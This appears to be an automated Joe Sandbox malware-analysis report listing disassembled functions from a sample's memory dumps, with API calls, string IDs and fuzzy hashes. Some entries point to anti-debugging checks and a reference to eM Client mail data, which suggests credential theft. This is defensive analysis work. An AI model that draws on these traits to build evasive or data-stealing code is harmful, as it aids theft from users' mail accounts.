                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                                    • API String ID: 0-1928883120
                                                                    • Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                                    • Instruction ID: 295a2138c5a9904cce95bca20cbaf49c8dc44489dbf6f35dc9c4833d63c62f8a
                                                                    • Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                                    • Instruction Fuzzy Hash: 3EE10BB1D1012E9BDF288B98CD81EBE76B5AB14204F244526EC1EF7751E739CA41CB93
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
                                                                    • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                                    • Instruction ID: af30a7423d53b2ed9e05bfdfaa0a26c4abe4ecd8aa3d0fdc8ac6f86824fa8700
                                                                    • Opcode Fuzzy Hash: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                                    • Instruction Fuzzy Hash: 2231C4749012299BCB21DF65D889BCDBBB8BF08310F5041EAE81CA7250E7749F858F49
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00424C2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleModuleName
                                                                    • String ID:
                                                                    • API String ID: 2106025501-0
                                                                    • Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                                    • Instruction ID: 0f79836f08216e1067b19f7748282cd10e66abfb9a44897a3127195f29ea1e18
                                                                    • Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                                    • Instruction Fuzzy Hash: 97F0A071201130BBD2349B2AEC4CF57BF6CEF86B70F014215FB19AB2A0D2789812C6D5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: =`f\
                                                                    • API String ID: 4218353326-984147390
                                                                    • Opcode ID: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                                    • Instruction ID: 937e01e95affed1bb86c4fb585bebd6cec6f4652e38a753aecbb8c34d3dca93f
                                                                    • Opcode Fuzzy Hash: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                                    • Instruction Fuzzy Hash: E5822671508301AFDB14CF19C880AABBBE1FF88344F04892EF99987391D779D995CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3333$UUUU$UUUU
                                                                    • API String ID: 0-1588839328
                                                                    • Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                                    • Instruction ID: db216e20b05cf36e7dbad7cd7ff9f755db6c04a52abf1afa55db9664f95289aa
                                                                    • Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                                    • Instruction Fuzzy Hash: 31419FB1610704CBCB588F19C88479277E6ABD8320F5981AADD058F38AE7B9CCC5CBC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                                    • Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
                                                                    • Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                                    • Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                                    • Instruction ID: 1e792c585b5fe79a443a32508fc7ec313994002ffb062f60f55b147da630af66
                                                                    • Opcode Fuzzy Hash: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                                    • Instruction Fuzzy Hash: 05F15E71E012199FDF24CFA9C884AADF7B1FF88324F15826AD915AB380D734A901DF94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: y_B>$y_B>
                                                                    • API String ID: 0-2639510964
                                                                    • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                                    • Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
                                                                    • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                                    • Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E
                                                                      • Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                                      • Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1
                                                                    • _CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
                                                                    • String ID:
                                                                    • API String ID: 4086067019-0
                                                                    • Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                                    • Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
                                                                    • Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                                    • Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4
                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1518329722-0
                                                                    • Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                                    • Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
                                                                    • Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                                    • Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LK$Y[
                                                                    • API String ID: 0-3215990068
                                                                    • Opcode ID: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                                    • Instruction ID: 2e19718e745c83073bb1607c6aa0d0b3959b9da5163b503e513578b3a7fa4beb
                                                                    • Opcode Fuzzy Hash: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                                    • Instruction Fuzzy Hash: 46E19DB2904215CBDB259F58C49426DFBF7AF84318F25892EE499DB790D3748B80CB53
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                                    • Instruction ID: 2e63c45fd147d1bc419a1cf421641fdd954adc511095b72776a1a782a704c190
                                                                    • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                                    • Instruction Fuzzy Hash: EBB15E31A10605CFD724CF28C486B657BA0FF45366F258699EC99CF3A2C339E986CB45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: y_B>
                                                                    • API String ID: 0-1404922283
                                                                    • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                                    • Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
                                                                    • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                                    • Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: a
                                                                    • API String ID: 0-3904355907
                                                                    • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                                    • Instruction ID: 318bea0468e25d50bc193c40de4e6b6217f0263c2ba9fd996b50af1c70fb3ca8
                                                                    • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                                    • Instruction Fuzzy Hash: AE121370608740DFD724CF19C980BABBBE2FBC8304F54892EE58987350D779E9858B96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: a
                                                                    • API String ID: 0-3904355907
                                                                    • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                                    • Instruction ID: a07ba8b594ba98883bec131c9e9a088c46f5a60eb019b747f14f3bd37d244c96
                                                                    • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                                    • Instruction Fuzzy Hash: 7E120170A083419FD764CF19C884B2BBBE6BF98308F84896DF58987251DB75E948CF52
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043D0CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                                    • Instruction ID: 4f8493139679013ee20e08bfcd7abab68794bcc2040eb7ee6f469f72a5842b4a
                                                                    • Opcode Fuzzy Hash: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                                    • Instruction Fuzzy Hash: E55106B1E002058FEB14CF55E8857ABBBF5FB48310F24947AD415EB354E3B8A980CB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: a
                                                                    • API String ID: 0-3904355907
                                                                    • Opcode ID: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                                    • Instruction ID: 722ab9fffa63a2ef7d1a063d6d10cc189525accf299069018822edd1fef34131
                                                                    • Opcode Fuzzy Hash: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                                    • Instruction Fuzzy Hash: 74E125702083419FD724CF19C584BABB7E1BFC8354F05892EF59987250E778E989CB9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                                    • Instruction ID: 8f191f8c23af4ff874e44819f72c4410366377a4132184dcb064a70586bdf8c7
                                                                    • Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                                    • Instruction Fuzzy Hash: 57C1CF76A006468FDF38CF68C48077EB7F6AF05318F144629D8DA9BA91C738E946CB51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU
                                                                    • API String ID: 0-2040033107
                                                                    • Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                                    • Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
                                                                    • Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                                    • Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 1804819252-0
                                                                    • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                                    • Instruction ID: bb654dc0c729bd842e55c2d84f7a994ffa3bbf5d7aaa00ddc59bb9740fabb160
                                                                    • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                                    • Instruction Fuzzy Hash: C21182731102214BC720DF48CDC0AA773AAFB89718766026AD9445B711D17AECC7C7E4
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0234FBEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 1804819252-0
                                                                    • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                                    • Instruction ID: ed0022786d00df90f2596bde09403202338bd6242bdd769f7c119627dc73cdef
                                                                    • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                                    • Instruction Fuzzy Hash: 3C112B325002614BC720CE48DDC096A73EAEB8971C76902D9DD455BE01D676FD86C7E0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DestroyHeap
                                                                    • String ID:
                                                                    • API String ID: 2435110975-0
                                                                    • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                                    • Instruction ID: 327f04a744b5650a880c0d17b4fb38287b6591765f983e0adcdd5822482b62ae
                                                                    • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                                    • Instruction Fuzzy Hash: D1119EB1900B848FD321CF69D845B9AFBF4FB49710F04C62AE8A897740D3786809CFA1
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0003CFB3,0043C903), ref: 0043CE8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                                    • Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
                                                                    • Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U
                                                                    • API String ID: 0-3372436214
                                                                    • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                                    • Instruction ID: 920c4e3f9504e8d2d4b163527b25bc307261b88a0300f18b1f19330db72b497f
                                                                    • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                                    • Instruction Fuzzy Hash: BF91D67D61C3018BDB249B5A84856BEBBE1BF85710F144C1FE9A9CB390D238D8C19B1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                                    • Instruction ID: b4bf6b1535a8192db109e4eceafa1359732031e4ea1743c163b6d2ec44044536
                                                                    • Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                                    • Instruction Fuzzy Hash: 5762A1316087418FC715DF29C180AAAB7F1FF88304F14896EE4CA9B351D779E996CB4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                                    • Instruction ID: 0a973efaa9903140cc486945bb1382a86dc342ddc411804bb8bf5106602af095
                                                                    • Opcode Fuzzy Hash: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                                    • Instruction Fuzzy Hash: 7312EAB1D0032E4BDF289A58C885DBE7675EB00618F242D27DC1DFA2A1E728C645CBD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                                    • Instruction ID: c832cbe4cea19542036e1dfb563506aac7cc4c9f85c134abf1f95b4790773896
                                                                    • Opcode Fuzzy Hash: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                                    • Instruction Fuzzy Hash: 301280B19087408FC324DF28C5816ABB7E2FF95314F144A2ED5D687B91E739E485CB4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                                    • Instruction ID: 00b37b14bcf7e53a0711464c53c4ad7664543ad39541697e4ede5dfa319fd604
                                                                    • Opcode Fuzzy Hash: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                                    • Instruction Fuzzy Hash: EB124A75A087059FC714CF29C5806AAFBE1FF88304F14892EE899D7351D778E895CB8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                                    • Instruction ID: 1eafb42da30f8327f2d2cf6283e90da06f622b94c7179535a6af078cda6ee9ef
                                                                    • Opcode Fuzzy Hash: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                                    • Instruction Fuzzy Hash: 55123775A087059FC314CF29C48066AFBE1FF88314F058A6EF899A7352DB74E955CB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                                    • Instruction ID: 9c48d330d68db8a76f352aed59f264cc12ac867535c25307469f3d273e047ffe
                                                                    • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                                    • Instruction Fuzzy Hash: 54F128B1E002098BDF288AA989915BFB6B1AF54310F25493FE015FF3D1E27D89458B5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                                    • Instruction ID: 3868d454bb0c875b8f5f92ecee85a45dfad0053a98280876ee76b67dfee254ad
                                                                    • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                                    • Instruction Fuzzy Hash: B6F12AB1E1060D8BDF2A9E98C8916BEB6B5BF45714F14492BE005EB3E0E7B4C741CB52
